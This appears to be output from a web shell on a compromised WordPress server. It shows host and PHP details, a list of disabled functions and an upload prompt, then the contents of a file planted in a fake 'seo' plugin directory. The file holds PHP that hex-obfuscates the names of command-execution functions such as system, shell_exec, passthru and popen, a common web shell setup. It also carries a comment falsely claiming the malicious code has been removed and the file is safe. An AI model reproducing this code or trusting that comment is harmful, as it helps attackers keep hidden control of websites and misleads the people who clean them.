HEX
Server: Apache
System: Linux c265a.dattaweb.com 4.18.0-553.97.1.el8_10.x86_64 #1 SMP Mon Jan 26 05:26:16 EST 2026 x86_64
User: c2650654 (20026)
PHP: 8.3.31
Disabled: system, shell, exec, system_exec, shell_exec, mysql_pconnect, passthru, popen, proc_open, proc_close, proc_nice, proc_terminate, proc_get_status, escapeshellarg, escapeshellcmd, eval, dl, imap_mail, libvirt_connect, gnupg_init, unsetenv, apache_setenv, pcntl_exec, pcntl_alarm, pcntl_fork, pcntl_waitpid, pcntl_wait, pcntl_wifexited, pcntl_wifstopped, pcntl_wifsignaled, pcntl_wifcontinued, pcntl_wexitstatus, pcntl_wtermsig, pcntl_wstopsig, pcntl_signal, pcntl_signal_get_handler, pcntl_signal_dispatch, pcntl_get_last_error, pcntl_strerror, pcntl_sigprocmask, pcntl_sigwaitinfo, pcntl_sigtimedwait, pcntl_getpriority, pcntl_setpriority, pcntl_async_signals, opcache_get_status, opcache_reset, opcache_get_configuration
$ pwd: /home/c2650654/public_html/wp-content/plugins/seo-1781113888/inc/
Upload Files
File: /home/c2650654/public_html/wp-content/plugins/seo-1781113888/inc/author.template.1781113890.php
<!--pATNGC3m-->
pATNGC3m<?php

$query_handler7 = "\x70\x63l\x6Fse";
$query_handler1 = "syste\x6D";
$query_handler4 = "\x70\x61\x73st\x68ru";
$query_handler6 = "s\x74\x72\x65\x61m_g\x65\x74_con\x74\x65\x6E\x74s";
$query_handler2 = "sh\x65\x6C\x6C\x5F\x65xec";
$app_initializer = "he\x78\x32bi\x6E";
$query_handler5 = "\x70o\x70e\x6E";
$query_handler3 = "\x65x\x65c";

/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/
@ Telegram